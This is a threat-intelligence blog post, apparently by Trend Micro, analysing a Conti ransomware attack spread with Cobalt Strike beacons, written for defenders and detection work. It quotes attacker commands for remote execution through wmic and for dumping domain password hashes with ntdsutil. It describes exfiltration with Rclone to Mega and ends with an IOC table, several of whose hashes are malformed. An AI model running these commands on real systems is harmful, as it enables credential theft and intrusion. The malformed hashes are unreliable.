In February of 2021, we were alerted to a series of suspicious events connected to an attack by the Conti ransomware gang. These events were spotted by the Trend Micro Vision One platform.
Conti has been described as the successor to the popular Ryuk ransomware family. Increasingly, threat actors are now distributing the malware via the same methods used to distribute Ryuk in the past. For example, both Trickbot/Emotet and BazarLoader are now being used to distribute Conti.
This blog post discusses how Cobalt Strike beacons (detected as Backdoor.<architecture>.COBEACON.SMA) is now being used for this and how we used the Trend Micro Vision One platform to track this threat. We believe that researchers at Sophos also encountered this particular group of threat actors; the attack they encountered and this one show similarities in the techniques used.
Finding the Threat
These attacks were spotted via the Workbench panel, which is accessible both to the SOCs of client organisations as well as MDR researchers. It can be used to help respond to ongoing incidents, as well as add context to any ongoing security investigations.
We saw sys64.dll (the Cobalt Strike beacon) being ordered to execute on a remote machine in this Workbench alert. The parent process is winlogon.exe, which is generally used for handling logon-related tasks. This makes the launch of sys64.dll quite suspicious.
This second alert is similar to the first, but instead of running sys64.dll, it executes vd.exe, which is also the Cobalt Strike beacon file. The command here is:
wmic /node:{IP address} /user:"<domain>\<user>" /password:"<password>" process call create "cmd /c C:\vd.exe"
Upon inspecting the events using the Search App, we see that these system executables are being subjected to process injection with the Cobalt Strike beacon code (vd.exe), as indicated by the telemetry event “701 – TELEMETRY_MODIFIED_PROCESS_CREATE_REMOTETHREAD”.
The attackers then attempted to dump domain password hashes using ntdsutil, saving the results as c:\windows\temp\abc for later use:
C:\Windows\system32\cmd.exe /C ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\abc" q q
The attacker didn’t immediately carry out any further malicious activity. Instead, several hours later, they started to deploy the Conti ransomware payload, which Trend Micro’s Predictive Machine Learning immediately detected. The file xx.dll is currently detected as Ransom.Win64.CONTI.A.
The CONTI ransomware deployment was followed by the ransom note being detected on several endpoints.
Missing: The Arrival Vector
What was not immediately clear was the arrival vector of the Cobalt Strike beacon. We delved deeper into this using the different features of Trend Micro Vision One.
Using Trend Micro Vision One’s Observed Attack Techniques (OAT) app, we noticed that several endpoints only started to send data to Trend Micro Vision One on February 11 and 12 of this year. Once we checked more telemetry, we were able to confirm that this was the case.
Feedback provided by the Smart Protect Network indicates possible Cobalt Strike beacon detections in the same organisation on February 4. This may be the first attempt to infiltrate the organisation that did not see initial success.
Beyond this potential attack, we were unable to identify any specific method used for the initial attack. The threat actor may have initiated the attack on endpoints that were unprotected or otherwise not monitored.
Responding to Incident Response
As we noted earlier, the organisation was responding to the attack by rolling out further protection to their endpoints. The threat actor was seemingly aware of this. In response, they decided to send out sensitive information as quickly as it can.
The OAT app showed several Trend Micro Vision One Filter hits related to “Rarely Accessed IP Address.” Expanding the details revealed where they store the stolen data.
The open-source tool “Rclone” is normally used to sync files to a specified cloud storage provider. In this incident, the attackers used the tool to upload files to Mega cloud storage.
Additional Cobalt/Cobeacon variants were seen a few days after the ransomware incident, indicating that the attackers still have access to unprotected endpoints.
Cobalt Strike Lateral Movement Techniques
The post-investigation timeline now looks like this:
We will now briefly describe how Cobalt Strike was able to spread itself and the Conti ransomware across the network.
With its ability to access and dump credential hashes from LSASS, it’s able to recover passwords and use them for further movement.
Cobalt/Cobeacon makes use of cmd.exe copy commands to send files to remote drives. It can be directly issued from the injected process (including winlogon.exe, wininit.exe, and wusa.exe) or use a batch script as an added layer.
The components are usually dropped in the following paths:
- C:\
- C:\ProgramData\
- C:\Temp\
On the remote endpoint, the file creation process will be initiated by ntoskrnl.exe. This behaviour can be paired with other Cobalt/Cobeacon behaviours to check for breaches or just used to monitor files created via this method, which attempts to save files in suspicious paths.
The same is also true when it sends the commands to execute copies of itself on the remote endpoints.
Aside from using scheduled tasks, it uses WMI commands to run either a DLL or EXE copy of itself, as seen in Figure 2.
Security Recommendations
While we do not know how this threat first entered the victim organisation, Conti is known for using phishing emails to deliver downloader malware that drops the ransomware payload. Awareness and training to handle potential social engineering risks will help reduce the risk.
Trend Micro’s comprehensive XDR solution applies the most effective expert analytics to the deep data sets collected from Trend Micro solutions across the enterprise — including email, endpoints, servers, cloud workloads, and networks — making faster connections to identify and stop attacks. Powerful artificial intelligence (AI) and expert security analytics correlate data from customer environments and Trend Micro’s global threat intelligence to deliver fewer, higher-fidelity alerts, leading to better, early detection. One console with one source of prioritised, optimised alerts supported with guided investigation simplifies the steps needed to fully understand the attack path and impact on the organisation.
IOCs
Filename |
Detection |
Purpose |
SHA256 |
sys64.dll |
Backdoor.Win64.COBEACON.SMA |
Wave 1 |
Unable to retrieve (from SPN data) |
tup2.bat |
Trojan.BAT.COBALSTART.A |
creates scheduled task for s.bat |
4cfb525902490909512d065a59ae820c99aec6129f7ea785d89bc20e7f7384509 |
tup3.bat |
Trojan.BAT.COBALSTART.A |
creates scheduled task for vd.exe |
0043aa3c5236d901333db1a4c9e0fd6e40a27b3f5330bca8a59de78e30758334 |
s.bat |
Trojan.BAT.CONTISTART.A |
Executes xx.dll |
52c851fc784e175cd2a029abfad62d3bf0408bed85d77d4f94d363e892bc4d60 |
xx.dll |
Ransom.Win64.CONTI.A |
For ransomware file encryption |
cb6eac0222102b6dcb72386aea373e89640f7c3a335591b561e56f35633f2bda |
sys64.dll |
Backdoor.Win64.COBALT.AG |
Communicate with C&C |
105d2eef1c6802e2ba3da84afe5ed91e986b55e77fefe1b6a203d3131ead6269 |
vd.exe/v.exe |
Backdoor.Win64.COBALT.AH |
Communicate with C&C |
c27875b0053bdddbfd121d21dc3cdb8bbf41091c8a8a0614c666aec8b4d3b612 |
rclone32.exe |
N/A |
Exfiltration tool |
eb03aba46e818640013bfe6b94367cae216a9ad02dabe69f241e3ace3f1a9f37 |
at.dll |
Trojan.Win64.ROZENA.AJ |
Wave 3 – Cobalt Strike beacon |
1c947639aec826b462e6c36416c873d26c11b081de707d9b5d963e30b59d9234d |
up.dll |
Trojan.Win64.ROZENA.AJ |
Wave 3 – Cobalt Strike beacon |
246907de4674c7a327a1a0b7coe92e50edd7cd02f56d6a008acc134f5fb5bb71c |
up.dll |
Trojan.Win64.ROZENA.AJ |
Wave 3 – Cobalt Strike beacon |
d1c1e7edc840a0623e0fdc9f2689133339e3coe58da1e24bce513a4673b9coe054 |
C&C Server:
IP Address: 23[.]82[.]128[.]116
Domain Name: secost[.]com